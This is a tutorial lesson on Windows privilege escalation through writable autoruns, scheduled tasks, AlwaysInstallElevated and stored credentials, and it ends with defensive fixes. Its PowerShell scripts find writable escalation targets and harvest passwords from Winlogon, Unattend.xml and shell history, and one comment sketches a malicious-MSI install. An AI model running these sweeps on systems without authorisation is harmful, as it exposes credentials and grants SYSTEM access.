Privilege Escalation · intermediate · ~11 min

Windows privesc: autostart, scheduled tasks, and AlwaysInstallElevated

Recognise registry-autorun, scheduled-task, and installer-based escalations.

Overview

Writable HKLM autorun keys or binaries, scheduled tasks that run writable scripts, and AlwaysInstallElevated (any user installs MSIs as SYSTEM) all escalate. Stored credentials (Credential Manager, autologon, Unattend.xml, shell histories) are harvested too. Fixes: lock ACLs, never set AlwaysInstallElevated, purge stored secrets.

Why it matters

These configuration-only escalations (especially AlwaysInstallElevated and writable autoruns/tasks) yield SYSTEM, or an administrator's logon, without any exploit code, and stored-credential hunting frequently shortcuts the whole chain. All of them are standard winPEAS findings.

Core concepts

Autorun. Writable HKLM Run key, or writable binary it points to → your code runs in the context of whoever logs on next, administrators included.
Scheduled tasks. Writable task target (or a task definition you can change) = your code runs as the task's user.
AlwaysInstallElevated. Both registry values (HKLM and HKCU) set to 1 → any MSI installs as SYSTEM.
Stored creds. Credential Manager, autologon (Winlogon) values, Unattend.xml/sysprep.inf, shell history.
Fix. Tighten ACLs, never enable AlwaysInstallElevated, purge stored secrets.

Lesson

More Windows escalation routes, all variations of "something privileged runs code you can influence".

Registry autorun

Programs listed under HKLM\...\Run (and the related RunOnce keys) start whenever any user logs on interactively, in that user's context. The key is machine-wide, so an entry you control runs for every account that logs on, administrators included. If you can write the HKLM autorun key itself, or the binary an existing entry points to (or its directory) has a weak ACL, your code runs with the privileges of the next administrator to log on.

Scheduled tasks

Like cron on Linux: a task that runs as a privileged user (SYSTEM, or an administrator with "Run with highest privileges") and executes a writable script or binary, or whose definition you can change, runs your code as that user. Enumerate with schtasks /query /fo LIST /v (or Get-ScheduledTask in PowerShell) and compare the "Run As User" field against the ACL of whatever "Task To Run" points at, including scripts passed as arguments.
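A combined check for the two preceding routes, added here as an example (it is not the lesson's own code and not winPEAS): it walks the HKLM Run keys and every scheduled-task action, extracts the executable and any script paths from the command line, and reports the ones the current user's SIDs can write to. It assumes Windows PowerShell 5.1 or later on Windows 8 / Server 2012 or newer (for Get-ScheduledTask); the rights regexes, the GENERIC_WRITE/GENERIC_ALL bit test and the output wording are this example's choices.

```powershell
# Added example (not the lesson's own code): list HKLM autorun entries and
# scheduled-task actions, then flag any target the CURRENT user can modify.
# Assumes Windows PowerShell 5.1+ on Windows 8 / Server 2012 or later (for
# Get-ScheduledTask). Run it as the low-privilege user you are testing from.

$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

$fileWrite = 'FullControl|Modify|\bWrite\b|WriteData|AppendData|ChangePermissions|TakeOwnership|\bDelete\b'
$regWrite  = 'FullControl|SetValue|CreateSubKey|WriteKey|ChangePermissions|TakeOwnership'

# True if an Allow ACE for one of my SIDs grants a right matching $RightsRegex.
# Caveat: Deny ACEs are ignored; confirm a hit with icacls before relying on it.
function Test-AclWritable {
    param($Acl, [string]$RightsRegex)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                    # orphaned SID: not one of mine
        if ($mySids -notcontains $sid) { continue }
        $rights = if ($null -ne $ace.FileSystemRights) { $ace.FileSystemRights } else { $ace.RegistryRights }
        if ("$rights" -match $RightsRegex) { return $true }
        if (([long]$rights -band 0x50000000) -ne 0) { return $true }   # GENERIC_ALL | GENERIC_WRITE
    }
    return $false
}

# Pull the executable out of a command line such as  "C:\Program Files\x\y.exe" /flag
function Get-ExecutablePath {
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if (-not $cmd) { return '' }
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {                # unquoted paths may contain spaces
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    $app = Get-Command $parts[0] -CommandType Application -ErrorAction SilentlyContinue   # bare "cmd"
    if ($app) { return @($app)[0].Source }
    return $parts[0]
}

# Print one line per target of $CommandLine that I can replace or plant.
function Show-TargetFinding {
    param([string]$Origin, [string]$RunsAs, [string]$CommandLine)
    $targets = @(Get-ExecutablePath $CommandLine)
    # Scripts passed as arguments (e.g. -File C:\scripts\backup.ps1) are targets too.
    foreach ($m in [regex]::Matches($CommandLine, '"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\[^\s"]+)')) {
        $targets += $m.Groups[1].Value + $m.Groups[2].Value
    }
    foreach ($t in ($targets | Where-Object { $_ } | Select-Object -Unique)) {
        $dir     = Split-Path -Parent $t
        $missing = -not (Test-Path -LiteralPath $t)
        $hits    = @()
        if (-not $missing -and (Test-AclWritable (Get-Acl -LiteralPath $t -ErrorAction SilentlyContinue) $fileWrite)) {
            $hits += 'file writable (replace it)'
        }
        if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-AclWritable (Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue) $fileWrite)) {
            $label = if ($missing) { 'target missing, directory writable (plant it)' } else { 'directory writable' }
            $hits += $label
        }
        if ($hits) { '{0} (runs as {1}): {2}  <-- {3}' -f $Origin, $RunsAs, $t, ($hits -join ', ') }
    }
}

# 1. HKLM autorun keys: entries run at every interactive logon, in that user's context.
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
$psMeta  = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    if (Test-AclWritable (Get-Acl -LiteralPath $key -ErrorAction SilentlyContinue) $regWrite) {
        "$key  <-- key writable: add your own entry"
    }
    foreach ($p in (Get-ItemProperty -LiteralPath $key).PSObject.Properties) {
        if ($psMeta -contains $p.Name) { continue }
        Show-TargetFinding "$key\$($p.Name)" 'next user to log on' "$($p.Value)"
    }
}

# 2. Scheduled tasks: check every action against the account the task runs as.
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    $runAs = if ($task.Principal.UserId) { $task.Principal.UserId } else { $task.Principal.GroupId }
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }                   # COM-handler actions have no path
        Show-TargetFinding "Task $($task.TaskPath)$($task.TaskName)" $runAs "$($action.Execute) $($action.Arguments)"
    }
}
```

A task hit only matters when the "runs as" account is more privileged than you, so read that field before celebrating; and because the check evaluates Allow ACEs only, re-check any reported path with icacls to make sure a Deny entry does not cancel it.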

AlwaysInstallElevated

A pair of registry values (HKLM and HKCU ...\Installer\AlwaysInstallElevated = 1) that make the Windows Installer service perform any MSI install a user starts with SYSTEM privileges. If both are set, craft a malicious MSI whose custom action runs your code → instant SYSTEM. A pure misconfiguration, no exploit. Check both values: the HKCU one is writable by the user anyway, so on its own it means nothing; it is the HKLM policy that makes the pair dangerous.
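Checking both values from PowerShell, as an added example (not the lesson's own code). The two key paths are the standard Windows Installer policy locations; a missing key or value is treated as "not set", and the msiexec line in the comment uses a placeholder MSI path.

```powershell
# Added example (not the lesson's own code): read both AlwaysInstallElevated policy
# values and report whether the escalation is live. Paths are the standard
# Windows Installer policy keys; a missing key or value counts as "not set".

function Test-AlwaysInstallElevated {
    $policy = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $result = [ordered]@{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $value = $null
        try {
            $value = (Get-ItemProperty -LiteralPath $policy[$hive] -Name AlwaysInstallElevated -ErrorAction Stop).AlwaysInstallElevated
        } catch { }                               # key or value absent: policy not configured here
        $result[$hive] = $value
    }
    # The Installer service only elevates when BOTH the machine and the user policy are 1.
    # HKCU alone proves nothing: any user can set it, so it is never honoured without HKLM.
    $result['Exploitable'] = ($result['HKLM'] -eq 1) -and ($result['HKCU'] -eq 1)
    [pscustomobject]$result
}

$aie = Test-AlwaysInstallElevated
$aie | Format-List     # same data as: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
if ($aie.Exploitable) {
    # Any MSI this user installs is now processed by the Windows Installer service with
    # SYSTEM privileges, e.g.  msiexec /quiet /qn /i C:\Users\Public\payload.msi
    # (payload.msi is a placeholder for an MSI whose custom action runs your code).
    Write-Warning 'AlwaysInstallElevated is set in both hives: MSI installs run as SYSTEM.'
}

# Remediation (as an administrator): delete the value in both hives or set it to 0, e.g.
#   Remove-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated
```

Run it as the unprivileged user: the HKCU value you see is that user's own, which is the one the Installer service will consult.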

Stored credentials

Windows leaves credentials in several places a privesc check harvests: the Credential Manager (cmdkey /list, which also holds saved RDP logons), autologon values under the Winlogon registry key (DefaultUserName and a plaintext DefaultPassword), unattended-install answer files (Unattend.xml, sysprep.inf, often carrying a plaintext or base64-encoded local administrator password), and PowerShell command history (PSReadLine's ConsoleHost_history.txt).
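A sweep of those locations, added here as an example (not the lesson's code): it lists Credential Manager entries, dumps the Winlogon autologon values, parses answer files for password elements and greps the PSReadLine history. The answer-file paths and the history path are the conventional defaults, assumed here; the decoding rule (when PlainText is false the value is base64 of the UTF-16LE password with the literal string "Password" appended) is the documented Unattend convention. The sample answer file embedded in the script is constructed for the demonstration and decodes to P@ssw0rd.

```powershell
# Added example (not the lesson's own code): sweep the stored-credential locations
# named above. Paths are the conventional defaults (assumed); adjust for odd installs.

# 1. Credential Manager entries visible to this user (saved RDP/SMB/web logons).
cmdkey /list

# 2. Autologon: Winlogon may hold the account name and a plaintext DefaultPassword.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
Get-ItemProperty -LiteralPath $winlogon |
    Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword

# 3. Unattended-install answer files. A password is stored plaintext, or as
#    base64(UTF-16LE(password + "Password")) when <PlainText>false</PlainText>.
function Get-UnattendPasswords {
    param([xml]$Xml)
    # Any element whose name ends in "Password" and carries a <Value> child
    # (AutoLogon/Password, UserAccounts/AdministratorPassword, LocalAccount/Password).
    $xpath = '//*[substring(local-name(), string-length(local-name()) - 7) = "Password"][*[local-name()="Value"]]'
    foreach ($node in $Xml.SelectNodes($xpath)) {
        $value   = $node.SelectSingleNode('*[local-name()="Value"]').InnerText
        $plain   = $node.SelectSingleNode('*[local-name()="PlainText"]')
        $isPlain = ($null -eq $plain) -or ($plain.InnerText -eq 'true')
        $password = if ($isPlain) { $value } else {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value))
            $decoded -replace 'Password$', ''          # strip the mandatory "Password" suffix
        }
        [pscustomobject]@{ Element = $node.LocalName; Password = $password }
    }
}

# Constructed sample answer file (not from a real host) in the encoded form.
$sample = [xml]@'
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password>
          <Value>UABAAHMAcwB3ADAAcgBkAFAAYQBzAHMAdwBvAHIAZAA=</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
'@
Get-UnattendPasswords $sample

$unattendPaths = 'C:\Unattend.xml', 'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml', 'C:\Windows\System32\Sysprep\Unattend.xml',
    'C:\Windows\System32\Sysprep\Panther\Unattend.xml'
foreach ($p in $unattendPaths) {
    if (Test-Path -LiteralPath $p) {
        "== $p"; Get-UnattendPasswords ([xml](Get-Content -LiteralPath $p -Raw))
    }
}
# sysprep.inf is INI-style: AdminPassword=... under [GuiUnattended].
$inf = 'C:\Windows\System32\Sysprep\sysprep.inf'
if (Test-Path -LiteralPath $inf) { Select-String -LiteralPath $inf -Pattern 'AdminPassword|DomainAdminPassword' }

# 4. PSReadLine history: every interactive PowerShell command this user typed.
$history = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
if (Test-Path -LiteralPath $history) {
    Select-String -LiteralPath $history -Pattern 'password|passwd|secret|ConvertTo-SecureString|net use|runas|cmdkey' |
        Select-Object -Unique Line
}
```

The XPath uses local-name() so the same function works whether or not the answer file declares the urn:schemas-microsoft-com:unattend namespace; history grepping is deliberately broad, so expect to read through the hits by hand.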

The fixes

Lock down the ACLs on HKLM autorun keys and on every autorun and task target, including the directories they live in; never set AlwaysInstallElevated; clear credentials from unattend files, the Winlogon key, and shell history; keep secrets in a credential vault instead.

Summary

Windows escalation also flows through writable autoruns and scheduled tasks, the AlwaysInstallElevated MSI flag, and harvested stored credentials — mostly pure misconfigurations. Defenses are ACL hygiene, disabling AIE, and removing stored secrets.